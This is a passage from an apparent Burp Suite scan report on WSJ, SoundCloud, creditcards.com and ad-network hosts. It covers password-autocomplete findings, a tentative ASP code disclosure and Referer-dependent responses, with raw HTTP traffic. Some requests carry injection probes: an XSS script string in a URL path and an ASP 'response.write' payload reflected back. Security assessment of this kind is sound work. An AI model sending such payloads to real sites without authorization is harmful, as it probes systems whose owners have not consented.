To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

12.1. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052702303714704576384051388321740.html

Issue detail

The page contains a form with the following action URL:

http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read

The form contains the following password fields with autocomplete enabled:

passwordReg
passwordConfirmationReg

Request

Response

12.2. http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052702303714704576384051388321740.html

Issue detail

The page contains a form with the following action URL:

http://commerce.wsj.com/auth/submitlogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.3. http://online.wsj.com/home-page previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/home-page

Issue detail

The page contains a form with the following action URL:

http://commerce.wsj.com/auth/submitlogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.4. http://soundcloud.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://soundcloud.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://soundcloud.com/session

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: soundcloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
X-Vary: X-Cookie-u-Logged-In, X-Cookie-nomob, X-User-Agent-Mobile, X-Cookie-auth-token
Cache-Control: max-age=300, public, must-revalidate
X-Runtime: 455
ETag: "d591950c75a72337bb8447eec5951f4a"
X-Cacheable: YES
Content-Length: 49809
Date: Thu, 16 Jun 2011 19:27:35 GMT
X-Varnish: 2254818324 2254797779
Age: 31
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT
Vary: Accept-Encoding, Cookie, User-Agent

<!DOCTYPE html>
<html><head><meta charset="utf-8" />
<title>SoundCloud - Your Sound, At The Heart</title>
<meta content="record, sounds, share, sound, audio, tracks, music, soundcloud" name="keywords"
...[SNIP]...
<div class="pane hidden" id="tab-log-in"><form accept-charset="utf-8" action="https://soundcloud.com/session" id="login-form" method="post">
<div class="form-group">
...[SNIP]...
</label><input class="title auto-select" id="site-password" name="password" type="password" /></div>
...[SNIP]...

12.5. http://soundcloud.com/help previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://soundcloud.com
Path:	/help

Issue detail

The page contains a form with the following action URL:

https://soundcloud.com/session

The form contains the following password field with autocomplete enabled:

password

Request

GET /help HTTP/1.1
Host: soundcloud.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179375142.1308252461.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-665808856-1308252464224; __utma=179375142.490461593.1308252461.1308252461.1308252461.1; __utmb=179375142.2.10.1308252461; __utmc=179375142; _soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlMDg1Y2NhZDg3OTMzODEyM2Y4NjY3OGUzYTI4MGNkMDk%3D--13bc80c08eeb5751e82a469b73291c8500747a13

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 90
ETag: "5e10d350cd43f18973fd406509624838"
Cache-Control: private, max-age=0, must-revalidate
X-Cacheable: NO:Cache-Control=max-age=0
Content-Length: 39802
Date: Thu, 16 Jun 2011 19:30:03 GMT
X-Varnish: 2254914646
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Vary: Accept-Encoding

<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="utf-8" />
<title>Help on SoundCloud - Create, record and share your sounds for free</title>
<met
...[SNIP]...
<div class="pane hidden" id="tab-log-in"><form accept-charset="utf-8" action="https://soundcloud.com/session" id="login-form" method="post">
<div class="form-group">
...[SNIP]...
</label><input class="title auto-select" id="site-password" name="password" type="password" /></div>
...[SNIP]...

12.6. http://soundcloud.com/help/premium-accounts previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://soundcloud.com
Path:	/help/premium-accounts

Issue detail

The page contains a form with the following action URL:

https://soundcloud.com/session

The form contains the following password field with autocomplete enabled:

password

Request

GET /help/premium-accounts HTTP/1.1
Host: soundcloud.com
Proxy-Connection: keep-alive
Referer: http://soundcloud.com/help
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179375142.1308252461.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-665808856-1308252464224; _soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlMDg1Y2NhZDg3OTMzODEyM2Y4NjY3OGUzYTI4MGNkMDk%3D--13bc80c08eeb5751e82a469b73291c8500747a13; __utma=179375142.490461593.1308252461.1308252461.1308252461.1; __utmb=179375142.3.10.1308252461; __utmc=179375142

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 104
ETag: "a734f5388de31e06490924d4df89d635"
Cache-Control: private, max-age=0, must-revalidate
X-Cacheable: NO:Cache-Control=max-age=0
Content-Length: 33990
Date: Thu, 16 Jun 2011 19:30:12 GMT
X-Varnish: 2254920345
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Vary: Accept-Encoding

<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="utf-8" />
<title>Help - Premium & Billing on SoundCloud - Create, record and share your soun
...[SNIP]...
<div class="pane hidden" id="tab-log-in"><form accept-charset="utf-8" action="https://soundcloud.com/session" id="login-form" method="post">
<div class="form-group">
...[SNIP]...
</label><input class="title auto-select" id="site-password" name="password" type="password" /></div>
...[SNIP]...

12.7. http://soundcloud.com/premium previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://soundcloud.com
Path:	/premium

Issue detail

The page contains a form with the following action URL:

https://soundcloud.com/session

The form contains the following password field with autocomplete enabled:

password

Request

GET /premium HTTP/1.1
Host: soundcloud.com
Proxy-Connection: keep-alive
Referer: http://soundcloud.com/help/premium-accounts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179375142.1308252461.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-665808856-1308252464224; _soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlMDg1Y2NhZDg3OTMzODEyM2Y4NjY3OGUzYTI4MGNkMDk%3D--13bc80c08eeb5751e82a469b73291c8500747a13; __utma=179375142.490461593.1308252461.1308252461.1308252461.1; __utmb=179375142.4.10.1308252461; __utmc=179375142

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 40
ETag: "24afcc165cc7920863a831dafc546f14"
Cache-Control: private, max-age=0, must-revalidate
X-Cacheable: NO:Cache-Control=max-age=0
Content-Length: 41457
Date: Thu, 16 Jun 2011 19:30:29 GMT
X-Varnish: 2254931704
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Vary: Accept-Encoding

<!DOCTYPE html>
<html><head><meta charset="utf-8" />
<title>SoundCloud Premium - Extra storage, advanced stats & other great features on SoundCloud - Create, record and share your sounds for free<
...[SNIP]...
<div class="pane hidden" id="tab-log-in"><form accept-charset="utf-8" action="https://soundcloud.com/session" id="login-form" method="post">
<div class="form-group">
...[SNIP]...
</label><input class="title auto-select" id="site-password" name="password" type="password" /></div>
...[SNIP]...

12.8. https://soundcloud.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://soundcloud.com/session

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.9. https://soundcloud.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://soundcloud.com/session

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.10. https://soundcloud.com/login'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/login'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The page contains a form with the following action URL:

https://soundcloud.com/session

The form contains the following password field with autocomplete enabled:

password

Request

GET /login'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: soundcloud.com
Cookie: _soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlOWFlYWNiZjJiMDg2MDkyMTVlMjc0Njc3ZTQwYmY0YmY%3D--e48a49c8403afeb04d19f0a182ecc2b8f49fbff0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 16 Jun 2011 19:30:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Length: 17757

<!DOCTYPE html>
<html><head><meta charset="utf-8" />
<title>Oops, looks like we can't find that page! on SoundCloud - Create, record and share your sounds for free</title>
<meta content="record, sound
...[SNIP]...
<div class="pane hidden" id="tab-log-in"><form accept-charset="utf-8" action="https://soundcloud.com/session" id="login-form" method="post">
<div class="form-group">
...[SNIP]...
</label><input class="title auto-select" id="site-password" name="password" type="password" /></div>
...[SNIP]...

13. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /oc/?pid=%3c%25+response.write(268409241-22)+%25%3e&pg=1477&pgpos=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:11 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705431140744015&data3=0&sid=1889&c=%3C%25+response.write%28268409241-22%29+%25%3E
Vary: Accept-Encoding
Content-Length: 2822
Content-Type: text/html
Set-Cookie: cardOfferHistory=deleted; expires=Thu, 17-Jun-2010 10:43:10 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="1477;<% response.write(268409241-22) %>;1;0"
s.purchaseID="1022011061705431140744015"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="1477"
s.eVar26="1"
s.eVar18=s.c_r('s_vi');

...[SNIP]...

14. Referer-dependent response previous next
There are 12 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5
http://adnxs.revsci.net/imp
http://api-cdn.cnbc.com/api/chart/chart.asp
http://api.bizographics.com/v1/profile.json
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/
http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/
http://pixel.adsafeprotected.com/jspix
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/widgets/recommendations.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

14.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Request 1

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response 1

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:05:38 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 12:05:38 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-12-05-38_7521471101308225938; expires=Tue, 14-Jun-2016 12:05:38 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_7521471101308225938; expires=Thu, 16-Jun-2011 12:20:38 GMT; path=/; domain=c3metrics.com
Content-Length: 6650
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if(!window.c3Vinter){function c3VTJSInter(){this.c3VInter={c3VJSurl:'c3VTabstrct-6-2.php'},this.c3VTVersion={vNo:'6.1.0',feature:'mNs+uI+in-view only+KL-for domain check, not CID'},this.c3VJS={c3VJSvtlog:'vtcall.php',c3VJSnid:'',c3VJScid:'',c3VJSuid:'',c3VJSnuid:'',c3VJSdomain:null,c3VJStv:'',c3VJSSPlitchar:'-',c3VJSunique:null,c3VJStag:0,c3VJSrun:0,c3Vresult:1,c3VJSuidSet:'',c3VJSrvSet:'',c3VJShold:new Array(),c3VJSsrcTag:0,c3VJSviewPortW:0,c3VJSviewPortH:0,c3VJSlimitW:600,c3VJSendW:300,c3VJSlimitH:600,c3VJSviewDelay:'',c3VJSinViewPid:null,c3VJSviewportwidth:0,c3VJSviewportheight:0,c3VJSeleTop:0,c3VJSeleBot:0,c3VJSeleLeft:0,c3VJSeleRight:0,c3VJSsrollLeft:0,c3VJSsrollTop:0,c3VJSevent:0,c3VTobjectName:0,c3VJScallurl:null,srcTag:0},this.C3VJSFindBaseurl=function(a,b){var c=document.getElementsByTagName('script');var d;var e;var f;var g;if(a.search('/')!=-1){var h=a.split('/');f=h[1]}else{f=a}var j=c.length;for(var i=0;i<j;i++){e=c[i].src;var k=new Array();k=e.split('?');d=k[0].search(b);if(d!=-1){g=k[0].replace(b,f);i=j}}return g},this.loadNewP=function(){var a=String(Math.floor(Math.random()*100));this.c3VJS.c3VJSinViewPid=a;try{b=document.createElement('<p id='+this.c3VJS.c3VJSinViewPid+'></p>')}catch(e){var b=document.createElement('p');b.setAttribute('id',this.c3VJS.c3VJSinViewPid)}var c=document.getElementsByTagName('script');var f=this.C3VJ
...[SNIP]...

Request 2

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response 2

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:05:46 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Connection: close
Content-Type: text/html

14.2. http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5

Request 1

GET /adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5;sz=300x250;click=http://a.tribalfusion.com/h.click/aomOvJT6rp3GQY0bQZaTPip5AQdQmbE4WBt0tZbLpdEM3PQT5cj8Tsn7WcfiPAFwTtY4UFjP3bapUEnnTTQcPqnLRcJIQrZavPW3iVcbU4FXxmtqtYaaM4dUGQcrF26QJmdAoUdBbYFfdYUZbh1EisRrJZdTU3XWtMTnb7oPbrNUtYHd5DTOn/;ord=1267541176? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308234568791&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 16 Jun 2011 14:29:30 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 1098
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><a target="_blank" href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=B_6sVShP6TY6hEZCd6AaRwtX3BAAAAAAQASAAOABQ27CPifj_____AVj6zIQTYMkGggEJY2EtZ29vZ2xlsgEOdGFnLmFkbWVsZC5jb23IAQLaAbYBaHR0cDovL3RhZy5hZG1lbGQuY29tL2FkL2lmcmFtZS82NzcvY25iYy8zMDB4MjUwL2F0Zj90PTEzMDgyMzQ1Njg3OTEmdHo9MzAwJm09MCZodT0maHQ9anMmaHA9MCZmbz0mdXJsPVVuaXZlcnNhbEF1ZGllbmNlUGxhdGZvcm0yMy5jb20mcmVmZXI9aHR0cCUzQSUyRiUyRnd3dy5jbmJjLmNvbSUyRmlkJTJGNDM0MjI4NjDAAgKoAwHYBICt4gTgBAKaBRgI3pI6EILY9RcY1474bCD6zIQTKM-BqQHaBQIIAA&num=0&sig=AGiWqtxEPCcLPprnYywFX1Vl8Ain6k5sjQ&client=&adurl=http://a.tribalfusion.com/h.click/aomOvJT6rp3GQY0bQZaTPip5AQdQmbE4WBt0tZbLpdEM3PQT5cj8Tsn7WcfiPAFwTtY4UFjP3bapUEnnTTQcPqnLRcJIQrZavPW3iVcbU4FXxmtqtYaaM4dUGQcrF26QJmdAoUdBbYFfdYUZbh1EisRrJZdTU3XWtMTnb7oPbrNUtYHd5DTOn/http://www.transunion.com/%3Fam%3D2061%26channel%3Dpaid%26cid%3Ddisplay:2061"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" alt="Advertisement" border="0" width="300" height="250"></a></body></html>

Request 2

GET /adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5;sz=300x250;click=http://a.tribalfusion.com/h.click/aomOvJT6rp3GQY0bQZaTPip5AQdQmbE4WBt0tZbLpdEM3PQT5cj8Tsn7WcfiPAFwTtY4UFjP3bapUEnnTTQcPqnLRcJIQrZavPW3iVcbU4FXxmtqtYaaM4dUGQcrF26QJmdAoUdBbYFfdYUZbh1EisRrJZdTU3XWtMTnb7oPbrNUtYHd5DTOn/;ord=1267541176? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 16 Jun 2011 14:29:44 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 827
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><a target="_blank" href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=B5cOfWBP6TYjkI5Cd6AaRwtX3BAAAAAAQASAAOABQ27CPifj_____AVj6zIQTYMkGggEJY2EtZ29vZ2xlyAECwAICqAMB2ASAreIE4AQCmgUYCN6SOhCC2PUXGNeO-Gwg-syEEyjPgakB2gUCCAA&num=0&sig=AGiWqtxqOjDptZNqMjRCwuE8UefE2MjoUQ&client=&adurl=http://a.tribalfusion.com/h.click/aomOvJT6rp3GQY0bQZaTPip5AQdQmbE4WBt0tZbLpdEM3PQT5cj8Tsn7WcfiPAFwTtY4UFjP3bapUEnnTTQcPqnLRcJIQrZavPW3iVcbU4FXxmtqtYaaM4dUGQcrF26QJmdAoUdBbYFfdYUZbh1EisRrJZdTU3XWtMTnb7oPbrNUtYHd5DTOn/http://www.transunion.com/%3Fam%3D2061%26channel%3Dpaid%26cid%3Ddisplay:2061"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" alt="Advertisement" border="0" width="300" height="250"></a></body></html>

14.3. http://adnxs.revsci.net/imp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://adnxs.revsci.net
Path:	/imp

Request 1

GET /imp?Z=300x250&s=1457934&r=0&_salt=1248176818&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; 